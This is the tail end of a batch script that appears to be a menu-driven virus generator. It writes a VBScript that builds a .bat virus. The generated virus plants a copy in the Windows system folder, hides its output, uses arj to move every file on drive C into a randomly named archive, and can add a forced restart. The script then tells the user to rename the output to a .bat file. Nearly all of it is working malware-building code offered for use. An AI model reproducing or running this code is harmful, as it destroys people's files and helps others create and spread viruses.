echo.b.Writeline "echo.Set b=a.CreateTextFile (d&"&"&".bat"&"&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.Set f=CreateObject("&"&"WScript.Shell"&"&")>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.e=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"ctty nul"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"if not exist c:\"&%&g&%&"winarj~1\arj.exe goto end"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"c:\"&%&g&%&"winarj~1\arj.exe m -g"&"&"&c&"&"&" -i -r -y -m0 -c "&"&"&e&"&"&".arj c:\*.*"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"ctty con"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&":end"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Writeline "&"&"cls"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.b.Close>>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "echo.f.Run "&"d"&Chr(38)&"&".bat"&"&">>%%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
echo.b.Writeline "cscript %%windir%%\system\"&c&"\"&c&".vbs">>batvirus.vbs
ctty con

:015
cls
echo.
echo.
echo.
echo        Restart
echo        ÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Restart after infection
echo.
echo    2 - Compile ...
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if errorlevel 3 goto done
if errorlevel 2 goto done
if errorlevel 1 goto a24
goto done

:a24
cls
ctty nul
echo.b.Writeline "rundll32 shell32.dll,SHExitWindowsEx 2">>batvirus.vbs
ctty con

:done
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo                   Compiling, please wait a few seconds ...
@echo                                 °°°°°°°°°
ctty nul
@type nul|choice /n /cy /ty,1 >nul
ctty con
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo                   Compiling, please wait a few seconds ...
@echo                                 ÛÛÛ°°°°°°
ctty nul
echo.b.Writeline "cls">>batvirus.vbs
echo.b.Close>>batvirus.vbs
cscript batvirus.vbs
ctty con
@type nul|choice /n /cy /ty,3 >nul
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo                   Compiling, please wait a few seconds ...
@echo                                 ÛÛÛÛÛÛ°°°
@type nul|choice /n /cy /ty,3 >nul
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo                   Compiling, please wait a few seconds ...
@echo                                 ÛÛÛÛÛÛÛÛÛ
@type nul|choice /n /cy /ty,3 >nul
ctty nul
deltree/y batvirus.vbs
ctty con
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo        Your creation is now compiled in curent folder [batvirus.txt]
@echo                      Rename batvirus.txt to filename.bat              
@echo.
@echo                          Press any key to exit ...
@pause >nul
:end
cls